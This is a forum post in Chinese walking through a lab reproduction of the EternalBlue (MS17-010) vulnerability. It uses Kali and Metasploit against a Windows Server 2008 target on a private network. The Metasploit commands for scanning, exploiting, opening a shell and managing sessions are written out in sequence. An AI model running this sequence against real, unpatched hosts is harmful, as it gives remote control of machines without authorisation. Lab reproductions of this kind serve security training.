小小小幸运 发表于 2024-5-15 08:13:02

永恒之蓝漏洞复现(ms17-010)

永恒之蓝漏洞复现(ms17-010)
                环境
                信息网络
                                先扫描目标靶机IP
                                进入MSF检察是否存在永恒之蓝的漏洞
                        攻击
永恒之蓝漏洞复现(ms17-010)

环境

攻击机:kali
靶机:Windows Server 2008
信息网络

对ip举行网络开放什么端口
先扫描目标靶机IP

由于在同一个内网之中
所以可以使用arp-scan -l 举行查询
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350230-805746087.png
知道目标靶机IP(192.168.162.146)来举行更进一步的信息网络
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350368-1369061368.png
nmap -sV -P- 192.168.162.146
使用nmap举行192.168.162.146IP下的全端口扫描
这里可以看出体系信息为Windows Server 2008
进入MSF检察是否存在永恒之蓝的漏洞

msfconsole
#征采模块
search ms17-010
#使用模块
use 3
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350628-1653017303.png
show options
检察选项
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350526-291403709.png
set RHOSTS 192.168.162.146
设置目标IP
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349967-728349125.png
存在永恒之蓝的漏洞
返回
攻击

使用攻击模块
search ms17-010
use 0
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350523-729850035.png
set RHOSTS 192.168.162.146
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349705-2069405913.png
攻击成功
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349869-654061827.png
输入shell
进入cmd模式
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349881-1652999895.png
exit 退出shell
background 把shell放入背景
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349746-1307778650.png
重新连接
sessions -i 1
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350072-838249294.png

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 永恒之蓝漏洞复现(ms17-010)